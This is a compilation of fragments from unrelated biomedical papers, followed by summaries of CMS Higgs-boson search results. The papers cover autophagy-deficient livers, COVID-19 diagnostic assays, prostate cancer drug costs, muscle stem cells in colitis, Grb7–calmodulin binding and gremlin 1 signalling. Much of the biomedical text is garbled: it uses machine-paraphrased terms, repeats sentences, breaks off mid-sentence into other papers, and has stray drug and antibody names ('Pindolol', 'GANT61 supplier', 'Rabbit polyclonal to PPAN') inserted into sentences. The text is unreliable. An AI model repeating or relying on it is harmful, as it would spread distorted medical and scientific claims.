ASC-J9 with the largest variance were selected, and then the expression data of the n genes were analysed by single-cell consensus clustering (SC3)19. n was tested from 500, 1000, 1500, 2000, 2500 and 3000. In SC3, the distance matrices were calculated based on Spearman correlation and then transformed by calculating the eigenvectors of the graph Laplacian. The k-means algorithm was put on the first d eigenvectors Then. Studies using genetic mouse versions which have defective autophagy have got led to the final outcome that macroautophagy/autophagy acts while a tumor suppressor Studies using genetic mouse versions which have defective autophagy have got led to the final outcome that macroautophagy/autophagy acts while a tumor suppressor. conserved from to mammals33C35. Yap may be the major focus on of Hippo signaling, which works as a transcriptional coactivator and binds towards the TEAD category of transcription elements for regulating the transcription of a couple of genes for cell proliferation, antiapoptosis, and stemness36,37. Yap is principally regulated in the posttranslational level via Hippo signaling-mediated sequestration and phosphorylation in the cytoplasm. Hippo pathway mutants or liver-specific deletion of Hippo parts (e.g., Mst1/2, Nf2) or overexpression of Yap potential clients to liver organ overgrowth phenotype and advancement of liver organ cancers35,38,39. Yap can be extremely indicated in biliary cells, and increased Yap activity in the liver promotes ductular reaction40. Therefore, many of the phenotypes from the Yap-activating livers including hepatomegaly, ductular reaction, and liver tumorigenesis were similar to the liver pathologies of autophagy-deficient livers. In a recent study, Lee at al.14 systematically investigated the role of Yap in the pathogenesis of L-Atg7 KO mice. By performing immunostaining for Yap, Lee et al. found that both cytoplasmic and nuclear Yap increased in L-Atg7 KO mouse livers and in primary cultured hepatocytes isolated from Atg7 KO mice. Moreover, gene set enrichment analysis of L-Atg7 KO Tenosal livers also revealed enrichment signature of Yap target genes, and increased expression of Yap target genes was further confirmed by qRT-PCR. These results support the notion that Yap is accumulated and activated in L-Atg7 KO mouse livers. To test whether autophagy could directly degrade Yap to cause the accumulation of Yap in L-Atg7 KO mice, Lee et al. inhibited autophagy either pharmacologically (using leupeptin and NH4Cl) or genetically knockdown Atg7 (using shRNA) in AML12 cells, and both conditions led to the increased levels of Yap protein. Moreover, Yap protein also colocalized with Lysotracker-positive lysosomes and GFPCLC3-positive autophagosomes in cultured THLE5B human hepatocytes. These observations suggest that Yap Tenosal could be degraded by autophagy, and livers with impaired autophagy may lead to the accumulation of Yap. To further determine the role of Yap in the pathogenesis of autophagy-deficient livers, Lee et al. generated tamoxifen inducible L-Yap/Atg7 double knockout (DKO) mice. Unlike the HMGB1/Atg7 DKO mice reported by Khambu et al.13, Yap/Ag7 DKO mice have decreased hepatocyte size, hepatomegaly, portal and lobular inflammation, ductular reaction, progenitor cell expansion, and fibrosis compared with L-Atg7 KO mice. Subsequently, Yap/Atg7 DKO mice also got reduced tumor amounts and size weighed against L-Atg7 KO mice, although tumors created in the Yap/Atg7 DKO mice still, which act like the HMGB1/Atg7 DKO mice. Oddly enough, p62-Nrf2 signaling pathway was turned on in Yap/Atg7 DKO mice still, recommending that Yap might work within a parallel pathway that plays a part in the hepatomegaly, liver organ damage, and tumorigenesis indie of Nrf2 activation in L- Atg7 KO mice. Potential and Overview PERSPECTIVES In conclusion, autophagy-deficient livers possess accumulated p62, elevated Nrf2 and Yap activation, aswell as elevated discharge of hepatic HMGB1, that are in charge of hepatomegaly, irritation, ductular response, fibrosis, and liver organ tumorigenesis. However, it would appear that p62, Nrf2, Yap, and KIAA0243 HMGB1 might play particular distinctive jobs and donate to the various pathologies in the autophagy-deficient livers. HMGB1 appears to work downstream of Nrf2 and plays a part in the ductular response and tumor development but will not affect hepatomegaly, irritation, and fibrosis. On the other hand, both Yap and Nrf2 donate to all of the Tenosal stages of liver organ pathogenesis including hepatomegaly, irritation, ductular response, fibrosis, and tumorigenesis in autophagy-deficient livers. It ought to be observed that deletion of Nrf2 abolishes liver organ tumorigenesis in L-Atg5 KO and L-Atg7 KO mice totally, but deletion with p62, HMGB1, or Yap just lowers the real amount of tumors in L-Atg5 KO and L-Atg7 KO mice. These observations claim that Nrf2 activation has a central and predominate function in adding to the pathogenesis of autophagy-deficient livers. While deletion of p62 inhibits the continual Nrf2 activation, liver organ damage, hepatomegaly, and liver organ tumorigenesis in L-Atg7 KO mice, the p62/Atg7 DKO mice still possess unchanged Nrf2 pathway which may be accountable for the occurrence of tumors in these DKO mice, although the number of tumors are decreased markedly. Similarly, deletion of either HMGB1 or Yap also has no or moderate effects on Nrf2 activation in L-Atg7 KO mice,. Supplementary MaterialsSupplementary data 1 mmc1 Supplementary MaterialsSupplementary data 1 mmc1. become of great value in designing a long-term strategy to tackle COVID-19. test for IgM and IgG detection. (Sensitivity?=?89%, specificity?=?100%)AdvaviteOther countries (in USA for research use)USARDTDetection Kit for IgM and IgG for SARS-CoV-2 in Pindolol blood samples within 15?min. (Specificity?=?100%, Sensitivity?=?87.3%)ScanWell Health/ INNOVITACE approved in China FDA approval for the USA. (In use for other countries)US/ChinaRDT-NATwo tests- a rapid assay for detection of antibodies reactive to recombinant viral protein and neutralization assayWang labCurrently in Use in SingaporeSingapore Open in a separate window RDT?=?Rapid Diagnosis Test, SPICA?=?Solid Phase Immunochromatographic Assay, NA?=?Neutralization Pindolol Assay). Johns Hopkins Universityand Envelope (gene which is a pan-SARS-beta-coronavirus gene. The confirmatory test is done by targeting the RdRp gene using specific primers and probes listed in Table 2 . The limit to detection is 3.6 copies (gene) and 3.9 copies (gene) per reaction and cycle threshold value of less than 37.0 is treated as a positive test. Specific probes and primers target the (ORF1 gene or Transcriptase/Replicase gene) as a confirmatory assay. While the level of gene confirms the presence Pindolol of SARS related virus. The minimum limit of detection is taken as 1000 copies/ml [18]. The cycle threshold value of less than 40 is set as positive confirmation test criteria. Desk 2 probes and Primers for focusing on SARS-Cov-2 genes within an RT-PCR check for COVID-19 analysis. gene) areas are targeted using primer and probe (Table 2). The assay uses specific probe and primers for three (gene primer and probe models are for recognition of most SARS-like Coronaviruses. The sensitivity of the assay is leaner than additional assays like a limit is had because of it of detection of 8.3 copies per response. Change transcription-loop mediated isothermal amplification (RT-LAMP) continues to be created to detect SARS-CoV-2 in individuals by focusing on gene and gene from the disease with 4 primers (external forward primer-F3, external backward primer-B3, ahead internal primer-FIP, and a backward internal primer-BIP). For accelerating the response, additional one or two 2 primers are added (loop ahead primer- LF) and/ or a loop backward primer- LB). The modification in color/ turbidity from the response blend from fluorescent dye hydrolysis for each and every hit on focus on after 60?min of incubation in 65?C is observed through a turbidimeter (O.D. at 650?nm) the worthiness of just one 1.0 is recognized as positive check [21]. For the qualitative recognition of the precise gene series of SARS-CoV-2, Pindolol the test can be gathered as nasopharyngeal or oropharyngeal swabs generally, sputum, lower respiratory system aspirates, bronchoalveolar lavage, or nasopharyngeal clean/aspirate as suggested from the FDA. Furthermore, swabs of top respiratory specimens including nasopharyngeal, nose swabs, or mid-turbinate are gathered from a person, with or without symptoms of COVID-19 actually. Regardless of the great benefits of these procedures, a well-trained specialized person must perform such diagnostic procedures. Potential of these molecular tools are restricted to the samples obtained from the respiratory tracts of the suspected individuals. Sputum, nasopharyngeal aspirates, BAL fluid, nasal aspirates, nasopharyngeal or oropharyngeal swabs can only be tested through this approach. Also, the chances of false-negative results become high when the lab reagents are contaminated, used past their expiry date, or samples are not timely Rabbit polyclonal to PPAN collected from the right region. False-negative results are also obtained with improper storage and transport of specimen, the presence of amplification inhibitors in samples, and if the mutation rate of the virus is high during the PCR cycle [62]. DETECTOR assay is an RNA-sensing assay that uses synthetic SARS-CoV-2 RNA fragments to recognize the signature of and gene sequences of SARS-CoV-2. Viral RNA targets are reversed transcribed to cDNA and amplified which subsequently transcribed back to RNA isothermally. The RNA fragments in the reaction. Objective To judge the cost-effectiveness from the addition of abiraterone or chemotherapy to androgen deprivation Objective To judge the cost-effectiveness from the addition of abiraterone or chemotherapy to androgen deprivation. to ADT weighed against ADT only (median 81 weeks 71 weeks; HR: 0.78; 95%CI: 0.66-0.93).( 2 , 3 ) Median Operating-system appears to be higher in STAMPEDE weighed against CHAARTED because males with high-risk localized prostate tumor were also permitted STAMPEDE.( 2 , 3 ) In 2017, two additional studies examined the mix of abiraterone plus ADT ADT only for castration-sensitive metastatic prostate tumor.( 4 , 5 ) STAMPEDE-ABI randomized 1,917 individuals and exposed that combinatory treatment improved Operating-system by 37% in comparison with ADT only.( 4 ) Likewise, LATITUDE enrolled 1,199 males and demonstrated that abiraterone plus ADT improved 3-season survival price by 17%, when compared with ADT only.( 5 ) Abiraterone is a steroidal CYP17A1 inhibitor that inhibits androgen synthesis in adrenal glands. This mechanism of action is interesting because adrenal gland is the second most important androgen-secreting gland (after testes) and is responsible for androgen secretion among men castrated by ADT. As a result, abiraterone has been studied for the treatment of castration-refractory metastatic prostate cancer before or after chemotherapy.( 6 , 7 ) CHAARTED, STAMPEDE and LATITUDE changed the mindset on prostate cancer treatment with their results, creating two additional standard therapies (docetaxel plus ADT, and abiraterone plus ADT) for hormone-sensitive metastatic prostate cancer. For the time being, due to the lack of data comparing abiraterone plus ADT versus docetaxel plus ADT, only indirect comparisons are possible. The rising costs of antineoplastic therapies makes cost-effectiveness an important issue worldwide.( 8 ) With the prospective rise in the use of abiraterone and docetaxel plus ADT, ZM-241385 it is important to understand their cost-effectiveness and how prostate tumor treatment Rabbit polyclonal to Amyloid beta A4 costs could be affected. OBJECTIVE To judge the cost-effectiveness of adding abiraterone or chemotherapy to androgen deprivation therapy androgen deprivation therapy by itself, for sufferers with castration-sensitive metastatic prostate tumor. The principal endpoint because of this research was the incremental cost-effectiveness proportion thought as the incremental price for every Quality-Adjusted Lifestyle Years obtained with the brand ZM-241385 new treatment. ZM-241385 Strategies We created a descriptive-analytical model to judge the cost-effectiveness from the addition of abiraterone or ZM-241385 docetaxel to ADT ADT by itself, for sufferers with hormone-sensitive metastatic prostate tumor. The model regarded three initial treatment plans (ADT plus abiraterone, Docetaxel plus ADT, and ADT by itself) accompanied by post development therapy and loss of life ( Body 1 ). Open up in another window Body 1 Analytic style of decision ADT: androgen deprivation therapy. The efficiency of remedies was examined in Quality-Adjusted Lifestyle Years (QALY) using electricity values for every health condition (alive and without development, alive after development acquiring hormone therapy, alive after development acquiring chemotherapy, and passed away). The utility prices of every ongoing health state were extracted from literature.( 9 ) Failure-free success (FFS) and OS of every arm in the model had been extracted from the region under curve obtainable in STAMPEDE clinical studies.( 3 , 4 ) The evaluation between ADT plus abiraterone and ADT plus docetaxel utilized the final results retrieved from our lately released network meta-analysis.( 10 ) An eternity horizon of 7 years was regarded for FFS and OS using an exponential estimation ( Body 2A and ?and2B2B ). Open up in another window Body 2 Survival quotes free of failing and overall success. (A) Failure-free success exponential estimative. (B) General success exponential estimative ADT: androgen deprivation therapy. The undesirable events due to each treatment had been regarded in the computation of QALY ZM-241385 using disutility ratings obtainable in the books.( 11 , 12 ) All medication acquisition costs had been predicated on the Brazilian cost indices accessed. Supplementary Materials Physique S1 Supplementary Materials Physique S1. mice treated with Mocetinostat enzyme inhibitor clodronate liposomes and MuSC supernatant (MuSC\S). Level bars, 75?m. Physique S4. IGF\2 expression in MuSCs and MSCs. A, Gene appearance degrees of IGF\2 in MSCs and MuSCs had been assayed by quantitative real-time polymerase chain response (qRT\PCR). B, Proteins appearance degrees of IGF\2 in MuSCs and MSCs were assayed by traditional western blot. C, Proteins appearance degrees of IGF\2 in MuSCs and MSCs under normoxia or hypoxic condition were assayed by traditional western blot. Data are provided as mean??SEM. **** ?.0001. Desk S1. Gene\particular primers for qRT\PCR. SCT3-9-773-s001.pdf (844K) GUID:?79E02DDF-EDB8-4519-BB13-DAB1A4DBE1A4 Data Availability StatementThe data that support the results of this research are available in the corresponding writers upon reasonable demand. Abstract Cytokines made by immune system cells have already been demonstrated to action on muscles stem cells (MuSCs) and immediate their destiny and behavior during muscles fix and regeneration. Even so, it really is unclear whether and exactly how MuSCs may subsequently modulate the properties of defense cells also. Here, we demonstrated that in vitro extended MuSCs exhibited a powerful anti\inflammatory impact when infused into mice experiencing inflammatory colon disease (IBD). Supernatant conditioned by MuSCs ameliorated IBD similarly. This beneficial aftereffect of MuSCs had not been noticed when macrophages had been depleted. The MuSC supernatant was discovered to significantly attenuate the appearance Mocetinostat enzyme inhibitor of inflammatory cytokines but raise the appearance of programmed loss of life\ligand 1 in macrophages treated with lipopolysaccharide and interferon gamma. Additional analysis uncovered that MuSCs create a massive amount insulin\like growth aspect\2 (IGF\2) that instructs maturing macrophages to endure oxidative phosphorylation and therefore acquire anti\inflammatory properties. Oddly enough, the IGF\2 creation by MuSCs is a lot greater than by mesenchymal stem cells. Knockdown or neutralization of IGF\2 abrogated the anti\inflammatory ramifications of MuSCs and their healing efficiency on IBD. Our study shown that MuSCs possess a strong anti\inflammatory house and the bidirectional relationships between immune cells and MuSCs have important implications in muscle mass\related physiological and pathological conditions. for 5 minutes. Second incubation was then performed by adding collagenase II (100?U/mL) and dispase (11?U/mL, Gibco) solution for 30?moments at 37C on a shaker. Digested cells were then filtered through a 40?m cell strainer to generate a mononucleated cell suspension ready for an antibody staining. Resuspended cells were stained using antibodies: PE\conjugated rat antimouse CD31, PE\conjugated rat antimouse CD45, APC\conjugated rat Mocetinostat enzyme inhibitor antimouse Sca1 and Pacific Blue\conjugated rat antimouse VCAM1 (both from Biolegend, San Diego, California). All antibodies were used at ~1 g per 107 cells. The staining samples were incubated with antibodies for 40?moments at 4C. MuSCs designated as VCAM1+CD31?CD45?Sca1? were acquired by fluorescence\triggered cell sorting. Sorted MuSCs were serially expanded every 2?days in myogenic cell proliferation medium containing F10 medium containing 20% fetal bovine serum (FBS), 5 ng/mL IL\1, 5 ng/mL IL\13, 10 ng/mL interferon gamma (IFN\) and 10 ng/mL TNF\, 2.5 ng/mL bFGF and 1% penicillin\streptomycin (both from Gibco). Supernatant was TNFRSF4 concentrated 10\collapse using 3 kD centrifugal filtration unit to IBD therapies. In addition, cultured MuSCs were differentiated in myogenic cell differentiation medium containing Dulbecco’s revised Eagle’s medium (DMEM) with 5% horse serum (both from Gbico) for 3?days. All details concerning the characterization of cultured MuSCs were shown in Number S1. 2.3. IBD induction and experimental therapies To induce colitis, 4% dextran sulfate sodium (DSS, MP Biomedicals, Santa Ana, California) in drinking water was offered ad libitum for 7?days. MuSCs (1 ?106) were i.v. administered to treat IBD mice on day time 2 after the beginning of DSS treatment. Some mice were treated with concentrated MuSC supernatant injected ip daily during IBD induction. Clodronate liposomes (1 mg/mice, from Yesen, Shanghai) were ip given to IBD mice on days 1 and 4 after the beginning of DSS treatment for macrophage deletion. IGF\2 neutralizing antibodies (20?g/mice, from R&D Systems, Minneapolis, Minnesota) were ip administered to IBD mice daily during IBD induction to block the function of IGF\2 in MuSC secretome. Control group mice received normal drinking water.. Grb7 is a signalling adapter protein that engages activated receptor tyrosine kinases at cellular membranes to effect downstream pathways of cell migration, proliferation and survival Grb7 is a signalling adapter protein that engages activated receptor tyrosine kinases at cellular membranes to effect downstream pathways of cell migration, proliferation and survival. Together, our data support the model of a CaM conversation with Grb7 via its RA-PH domain name. Mig-10 (the Grb and Mig region, GM) and a C-terminal Src-homology 2 (SH2) domain name [3]. The GM domain name, in turn, is made up of Ras-associating (RA) and Pleckstrin homology (PH) domains and a BPS (between PH and SH2) domain name (Physique 1A). It really is through the C-terminal SH2 area that Grb7 can connect to phosphorylated tyrosines of turned on upstream tyrosine kinase companions, leading to Grb7 phosphorylation on the GM area, and propagation of downstream occasions. However, the other domains of Grb7 get excited about mediating signalling outcomes also. For instance, the RA area can impact proliferative signalling pathways by getting together with turned on GTP bound Ras [4], the N-terminal PR area continues to be reported to connect to the RNA-binding proteins HuR, facilitating recruitment to tension granules [5,6], as well as the PH area facilitates interactions using the cell membrane where SH2 area mediated connections with GANT61 supplier membrane bound receptors are shaped [7]. Open up in another window Body 1 Grb7 area framework. (A) Schematic depicting the agreement of Grb7 domains and highlighting the positioning from the postulated calmodulin (CaM) binding site; (B) Style of the Grb7 RA-PH domains based on the Grb10 RA-PH framework (PDB:3HK0). The RA area is coloured whole wheat, the PH area is purple as well as the residues that match the Grb7 CaM-BD are colored orange. The PH area was reported to bind the tiny also, ubiquitously expressed proteins calmodulin (CaM) within a calcium dependent manner [8]. The Villalobo group showed pull-down of Grb7 from cells by CaM-affinity chromatography and interactions with Grb7 from cell extract were supported by biotin-CaM detection. The conversation was further shown to regulate both Grb7s ability to localize to membranes, and its trafficking to the nucleus [8,9,10]. CaM undergoes a conformational change upon binding calcium, allowing newly uncovered hydrophobic residues to bind an array of cytosolic target proteins, including partners that are involved with regulating cell shape and migration [11,12]. For Grb7, the CaM binding site was mapped to the proximal region of the PH domain name (Grb7 residues 243C256). A peptide representing this region was shown to have high affinity for CaM [13]. Together, GANT61 supplier these experiments show compelling evidence for a Grb7/CaM conversation. However, a direct Grb7/CaM conversation has never been verified with real full-length Grb7 protein nor quantitated. Furthermore, it has been established that Grb7 can be phosphorylated around the central GM region, specifically Y188 and Y338, and this phosphorylation is required for ErbB2 mediated signalling via Grb7 [14,15]. Whether or not RA-PH phosphorylation, or additional Grb7 post-translational modifications, are GANT61 supplier also required for the Grb7/CaM conversation has not yet been explored. Lastly, while the structure of the Grb7 PH domain name has not been decided, by structural homology to the Grb10 RA-PH domain name (56% sequence identity) the predicted CaM binding motif corresponds to a region of -strand (amino acid sequence: RKLWKRFFCFLRRS) (Physique 1B). This was unexpected, as it was originally postulated that this Grb7 CaM binding motif represented an -helical target [8], and suggests a non-canonical mode of conversation. The current study was therefore undertaken to determine whether direct interactions between CaM and purified Grb7 could be detected in vitro and in the absence of post-translational modifications or additional cellular factors. To do this we expressed and purified recombinant CaM and full-length Grb7 from and analyzed their conversation using surface area plasmon resonance (SPR) that Rabbit Polyclonal to KCY detects molecular connections with high awareness. We created the RA-PH area of Grb7 in isolation also, aswell as the SH2 by itself, to be able to determine the necessity from the RA-PH area for the Grb7/CaM relationship. We confirmed that CaM can connect to full-length Grb7 within a calcium mineral dependent way, and that relationship isn’t mediated through the SH2 area. On the other hand, we noticed high micromolar affinity binding between your Grb7 RA-PH area and CaM that’s also reliant on the current presence of calcium mineral. Thus, we’re able to concur that Grb7 and CaM perform straight interact certainly, although if additional factors must augment the relationship in vivo continues to be open for analysis. 2. Outcomes To be able to verify a primary relationship between Grb7 and CaM in vitro, GANT61 supplier high purity. Supplementary MaterialsPUL807205 Supplemental Materials1 – Supplemental materials for Gremlin 1 blocks vascular endothelial development aspect signaling in the pulmonary microvascular endothelium PUL807205_Supplemental_Materials1 Supplementary MaterialsPUL807205 Supplemental Materials1 – Supplemental materials for Gremlin 1 blocks vascular endothelial development aspect signaling in the pulmonary microvascular endothelium PUL807205_Supplemental_Materials1. the pulmonary microvascular endothelium PUL807205_Supplemental_Materials3.pdf (209K) GUID:?7CDB98CC-0B25-43D3-8529-4209087DD594 Supplemental materials, PUL807205 Supplemental Materials3 for Gremlin 1 blocks vascular endothelial development aspect signaling in the pulmonary microvascular endothelium by Simon C. Rowan, Lucie Piouceau, Joanna Cornwell, Lili Li and Paul McLoughlin in Pulmonary Flow PUL807205 Supplemental Materials4 – Supplemental materials for Gremlin 1 blocks vascular endothelial development aspect signaling in the pulmonary microvascular endothelium PUL807205_Supplemental_Materials4.pdf (91K) GUID:?A6FD9861-8B24-4636-ACC1-31DCE38482E3 Supplemental materials, PUL807205 Supplemental Material4 for Gremlin 1 blocks vascular endothelial growth factor signaling in the pulmonary microvascular endothelium by Simon C. Rowan, Lucie Piouceau, Joanna Cornwell, Lili Li and Paul McLoughlin in Pulmonary Blood circulation PUL807205 Supplemental Material5 – Supplemental material for Gremlin 1 blocks vascular endothelial growth element signaling in the pulmonary microvascular endothelium PUL807205_Supplemental_Material5.pdf (128K) GUID:?AEEFD65A-9CBC-46D3-ADD5-BAC1F4A00DDE Supplemental material, PUL807205 Supplemental Material5 for Gremlin 1 blocks vascular endothelial growth factor signaling in the pulmonary microvascular endothelium by Simon C. Rowan, Lucie Piouceau, Joanna Cornwell, Lili Li and Paul McLoughlin in Pulmonary Blood circulation Abstract The bone morphogenetic protein (BMP) antagonist gremlin Imatinib Mesylate distributor 1 takes on a central part in the pathogenesis of hypoxic pulmonary hypertension (HPH). Recently, non-canonical functions of gremlin 1 have been identified, including specific binding to the vascular endothelial growth element receptor-2 (VEGFR2). We tested the hypothesis that gremlin 1 modulates VEGFR2 signaling Imatinib Mesylate distributor in the pulmonary microvascular endothelium. We examined the effect of gremlin 1 haploinsufficiency within the manifestation of VEGF responsive genes and proteins in the hypoxic (10% O2) murine lung in vivo. Using human being microvascular endothelial cells in vitro we examined the effect of gremlin 1 on VEGF signaling. Gremlin 1 haploinsufficiency (Grem1+/C) attenuated the hypoxia-induced increase in gremlin 1 observed in the wild-type mouse lung. Reduced gremlin 1 manifestation in hypoxic Grem1+/C mice restored VEGFR2 manifestation and endothelial nitric oxide synthase (eNOS) manifestation and activity to normoxic ideals. Recombinant monomeric gremlin 1 inhibited VEGFA-induced VEGFR2 activation, downstream signaling, and VEGF-induced raises in Bcl-2, cell number, and the anti-apoptotic effect of VEGFA in vitro. These results show the monomeric form of gremlin 1 functions as an antagonist of VEGFR2 activation in the pulmonary microvascular endothelium. Given the previous demonstration that inhibition of VEGFR2 causes designated worsening of HPH, our results suggest that improved gremlin 1 in the hypoxic lung, in addition to obstructing BMP receptor type-2 (BMPR2) signaling, contributes importantly to the development of PH by a non-canonical VEGFR2 obstructing activity. values were computed with the exact (permutation) method. Multiple post hoc evaluations were corrected using Imatinib Mesylate distributor the HolmsCSidak step-down check.26 Beliefs of values are proven. Results We Imatinib Mesylate distributor initial analyzed gremlin 1 appearance in mouse lungs and isolated individual pulmonary microvascular endothelial cells TNFSF10 in vitro and discovered that it is portrayed in monomeric type in both tissues homogenate and in endothelial cells (Supplemental Fig. 1). We following examined the activities of gremlin 1 in the lung in vivo using wild-type mice (Grem1+/+) and gremlin 1 haploinsufficient (Grem1+/C) mice.9 Gremlin 1 protein expression had not been detectably different in normoxic wild-type and normoxic Grem1+/C lungs (Fig. 1a). Phosphorylation of SMAD 1/5/9 and appearance of Kv1.5 were also unchanged in normoxic Grem1+/C lungs in comparison to normoxic wild-type lungs (Supplemental Fig. 2). In hypoxia, gremlin 1 appearance was significantly low in the lungs of Grem1+/C mice compared to hypoxic wild-type handles (Fig. 1a). The BMP-dependent phosphorylation of SMADs 1/5/9 as well as the appearance from the BMP-regulated potassium route Kv1.5 in vascular even muscle in wild-type lungs was decreased after 48 significantly?h of contact with hypoxia. On the other hand, both phosphorylation of SMAD 1/5/9 and Kv1.5 expression were preserved in the lungs of hypoxic Grem1+/C mice (Supplemental Fig. 2), commensurate with the enhancement of BMP activity caused by the decreased gremlin 1 appearance in these lungs (Supplemental Fig. 2). Regular appearance of Kv1.5 performs a significant function in the maintenance of normal vascular resistance pulmonary.27C29 These findings demonstrated that gremlin 1 was effectively low in the hypoxic haploinsufficient mouse and so are commensurate with the canonical role of gremlin 1 in modulating BMP signaling.9,30,31 Open up in another window Fig. 1. Gremlin 1 haploinsufficiency decreases gremlin 1 appearance and restores VEGFR2 appearance and eNOS appearance and activity in the hypoxic lung in vivo. (a) Consultant traditional western blot and densitometric evaluation of gremlin 1 appearance in normoxic and hypoxic wild-type (+/+) and Grem1+/C lung lysate. (b) Consultant traditional western blot and densitometric evaluation of VEGFR2 appearance in normoxic and hypoxic wild-type (+/+) and Grem1+/C lung lysate. (c) Immunohistochemical localization of eNOS.
__label__pos
0.756806
Date Subject_areas Reactions Search for resonances decaying to a pair of Higgs bosons in the $\mathrm{b\overline{b}q\overline{q}'}\ell\nu$ final state in proton-proton collisions at $\sqrt{s}=$ 13 TeV The CMS collaboration Sirunyan, Albert M ; Tumasyan, Armen ; Adam, Wolfgang ; et al. JHEP, 2019. Inspire Record 1728701 DOI 10.17182/hepdata.88898 A search for new massive particles decaying into a pair of Higgs bosons in proton-proton collisions at a center-of-mass energy of 13 TeV is presented. Data were collected with the CMS detector at the LHC, corresponding to an integrated luminosity of 35.9 fb$^{-1}$. The search is performed for resonances with a mass between 0.8 and 3.5 TeV using events in which one Higgs boson decays into a bottom quark pair and the other decays into two W bosons that subsequently decay into a lepton, a neutrino, and a quark pair. The Higgs boson decays are reconstructed with techniques that identify final state quarks as substructure within boosted jets. The data are consistent with standard model expectations. Exclusion limits are placed on the product of the cross section and branching fraction for generic spin-0 and spin-2 massive resonances. The results are interpreted in the context of radion and bulk graviton production in models with a warped extra spatial dimension. These are the best results to date from searches for an HH resonance decaying to this final state, and they are comparable to the results from searches in other channels for resonances with masses below 1.5 TeV. 2 data tables Observed and expected 95% CL upper limits on the product of the cross section and branching fraction to HH for a generic spin-0 (left) and spin-2 (right) boson X, as a function of mass. Example radion and bulk graviton predictions are also shown. The HH branching fraction is assumed to be 25 and 10%, respectively. Observed and expected 95% CL upper limits on the product of the cross section and branching fraction to HH for a generic spin-0 (left) and spin-2 (right) boson X, as a function of mass. Example radion and bulk graviton predictions are also shown. The HH branching fraction is assumed to be 25 and 10%, respectively. Search for the decay of a Higgs boson in the $\ell\ell\gamma$ channel in proton-proton collisions at $\sqrt{s} =$ 13 TeV The CMS collaboration JHEP 1811 (2018) 152, 2018. Inspire Record 1678088 DOI 10.17182/hepdata.86538 A search for a Higgs boson decaying into a pair of electrons or muons and a photon is described. Higgs boson decays to a Z boson and a photon (H $\to$ Z$\gamma\to\ell\ell\gamma$, $\ell =$ e or $\mu$), or to two photons, one of which has an internal conversion into a muon pair (H $\to\gamma^{*}\gamma\to\mu\mu\gamma$) were considered. The analysis is performed using a data set recorded by the CMS experiment at the LHC from proton-proton collisions at a center-of-mass energy of 13 TeV, corresponding to an integrated luminosity of 35.9 fb$^{-1}$. No significant excess above the background prediction has been found. Limits are set on the cross section for a standard model Higgs boson decaying to opposite-sign electron or muon pairs and a photon. The observed limits on cross section times the corresponding branching fractions vary between 1.4 and 4.0 (6.1 and 11.4) times the standard model cross section for H $\to\gamma^{*}\gamma\to\mu\mu\gamma$ (H $\to$ Z$\gamma\to\ell\ell\gamma$) in the 120-130 GeV mass range of the $\ell\ell\gamma$ system. The H $\to\gamma^*\gamma\to\mu\mu\gamma$ and H $\to$ Z$\gamma\to\ell\ell\gamma$ analyses are combined for $m_\mathrm{H} =$ 125 GeV, obtaining an observed (expected) 95% confidence level upper limit of 3.9 (2.0) times the standard model cross section. 3 data tables Exclusion limit, at 95% CL, on the cross section of the $H \rightarrow ll\gamma$ relative to the SM prediction, for an SM Higgs boson of $m_{H} = 125$ GeV. The upper limits of each analysis category, as well as their combinations, are shown. Exclusion limit, at 95% CL, on the cross section of the $H \rightarrow \gamma^{*}\gamma \rightarrow \mu\mu\gamma$ process relative to the SM prediction, as a function of the Higgs boson mass. Exclusion limit, at 95% CL, on the cross section of the $H \rightarrow Z\gamma \rightarrow ll\gamma$ process relative to the SM prediction, as a function of the Higgs boson mass. Search for heavy resonances decaying into two Higgs bosons or into a Higgs boson and a W or Z boson in proton-proton collisions at 13 TeV The CMS collaboration Sirunyan, Albert M ; Tumasyan, Armen ; Adam, Wolfgang ; et al. JHEP 1901 (2019) 051, 2019. Inspire Record 1685235 DOI 10.17182/hepdata.88169 A search is presented for massive narrow resonances decaying either into two Higgs bosons, or into a Higgs boson and a W or Z boson. The decay channels considered are HH$\to \mathrm{b\overline{b}}\tau^{+}\tau^{-}$ and VH$ \to \mathrm{q\overline{q}}\tau^{+}\tau^{-}$, where H denotes the Higgs boson, and V denotes the W or Z boson. This analysis is based on a data sample of proton-proton collisions collected at a center-of-mass energy of 13 TeV by the CMS Collaboration, corresponding to an integrated luminosity of 35.9 fb$^{-1}$. For the TeV-scale mass resonances considered, substructure techniques provide ways to differentiate among the hadronization products from vector boson decays to quarks, Higgs boson decays to bottom quarks, and quark- or gluon-induced jets. Reconstruction techniques are used that have been specifically optimized to select events in which the tau lepton pair is highly boosted. The observed data are consistent with standard model expectations and upper limits are set at 95% confidence level on the product of cross section and branching fraction for resonance masses between 0.9 and 4.0 TeV. Exclusion limits are set in the context of bulk radion and graviton models: spin-0 radion resonances are excluded below a mass of 2.7 TeV at 95% confidence level. In the spin-1 heavy vector triplet framework, mass-degenerate W' and Z' resonances with dominant couplings to the standard model gauge bosons are excluded below a mass of 2.8 TeV at 95% confidence level. There are the first limits for these decay channels at $\sqrt{s}=$ 13 TeV. 5 data tables Observed 95% CL upper limits on the product of the production cross section and the branching fraction for a new spin-0 resonance decaying to HH, as a function of the resonance mass hypothesis. Observed 95% CL upper limits on the product of the production cross section and the branching fraction for a new spin-2 resonance decaying to HH, as a function of the resonance mass hypothesis. Observed 95% CL upper limits on the product of the production cross section and the branching fraction for a new spin-1 W prime resonance decaying to WH, as a function of the resonance mass hypothesis. More… Observation of Higgs boson decay to bottom quarks The CMS collaboration Sirunyan, A. M. ; Tumasyan, Armen ; Adam, Wolfgang ; et al. Phys.Rev.Lett. 121 (2018) 121801, 2018. Inspire Record 1691854 DOI 10.17182/hepdata.86132 The observation of the standard model (SM) Higgs boson decay to a pair of bottom quarks is presented. The main contribution to this result is from processes in which Higgs bosons are produced in association with a W or Z boson (VH), and are searched for in final states including 0, 1, or 2 charged leptons and two identified bottom quark jets. The results from the measurement of these processes in a data sample recorded by the CMS experiment in 2017, comprising 41.3  fb-1 of proton-proton collisions at s=13  TeV, are described. When combined with previous VH measurements using data collected at s=7, 8, and 13 TeV, an excess of events is observed at mH=125  GeV with a significance of 4.8 standard deviations, where the expectation for the SM Higgs boson is 4.9. The corresponding measured signal strength is 1.01±0.22. The combination of this result with searches by the CMS experiment for H→bb¯ in other production processes yields an observed (expected) significance of 5.6 (5.5) standard deviations and a signal strength of 1.04±0.20. 2 data tables Expected and observed significances, in number of standard deviations, and observed signal strengths for the VH production process with H-->b bbar. Results are shown separately for 2017 data, combined Run 2 (2016 and 2017 data), and for the combination of the Run 1 and Run 2 data. For the 2017 analysis, results are shown separately for the individual mu value for each channel from a combined simultaneous fit to all 